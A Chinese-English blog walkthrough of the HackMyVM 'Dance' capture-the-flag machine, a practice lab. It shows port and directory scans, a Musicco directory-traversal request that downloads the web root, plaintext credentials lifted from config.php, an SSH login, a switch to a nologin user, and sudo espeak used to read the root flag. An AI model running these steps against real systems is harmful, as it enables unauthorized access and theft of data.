Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Dance Walkthrough

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance


Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 ...
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 ...
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80, found /music.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 121]
 /music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]


Enter /music in web browser, check information, it's a web app called musicco.

image-20210914101829803.png


Search exploit of musicco.

 ~ searchsploit musicco
 ---------------------------------------------------------------------------------------------------------
  Exploit Title                                                                                                             |  Path
 ---------------------------------------------------------------------------------------------------------
 Musicco 2.0.0 - Arbitrary Directory Download                                                                               | php/webapps/45830.txt
 ---------------------------------------------------------------------------------------------------------


Through the exploit, we can download the whole html dir as a zip file.

 ~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip


Unzip var.zip, check /music/config.php, get some credentials.

 ~ cat config.php   
 <?php
 $_CONFIG['saveConfig'] = '';
 $_CONFIG['users'] = array(
          array('admin', 'admin', 'true'),
          array('guest', 'guest', 'false'),
         array('aria', 'seraphim', 'false'),
         array('alice', 'rememberyou', 'false'),
         array('ava', 'password', 'false'),
         array('alba', 'thehostof', 'false'),
 );
 $_CONFIG['lang'] = 'en';
 $_CONFIG['musicRoot'] = 'music';
 $_CONFIG['coverFileName'] = 'folder';
 $_CONFIG['coverExtension'] = '.png';
 $_CONFIG['loadLyricsFromFile'] = 'on';
 $_CONFIG['downLoadMissingCovers'] = 'on';
 $_CONFIG['searchEngine'] = '';
 $_CONFIG['imageSearchEngine'] = '';
 ?>


We can login ssh as user aria.

 ~ ssh aria@192.168.56.100
 aria@dance:~$ id
 uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Another user is alba, but it's nologin.

 aria@dance:~$ cat /etc/passwd|grep alba
 alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin


So we need to set the login shell for alba, then escalate to user alba.

 aria@dance:~$ su -s /bin/bash alba
 Password:
 alba@dance:/home/aria$ id
 uid=1001(alba) gid=1001(alba) groups=1001(alba)


Check sudo -l.

 alba@dance:/home/aria$ sudo -l
 Matching Defaults entries for alba on dance:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User alba may run the following commands on dance:
     (root) NOPASSWD: /usr/bin/espeak


The last step is to use espeak to read (or listen to) /root/root.txt.

 alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt  -q -X
 Translate 'rootflag'
 ...




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1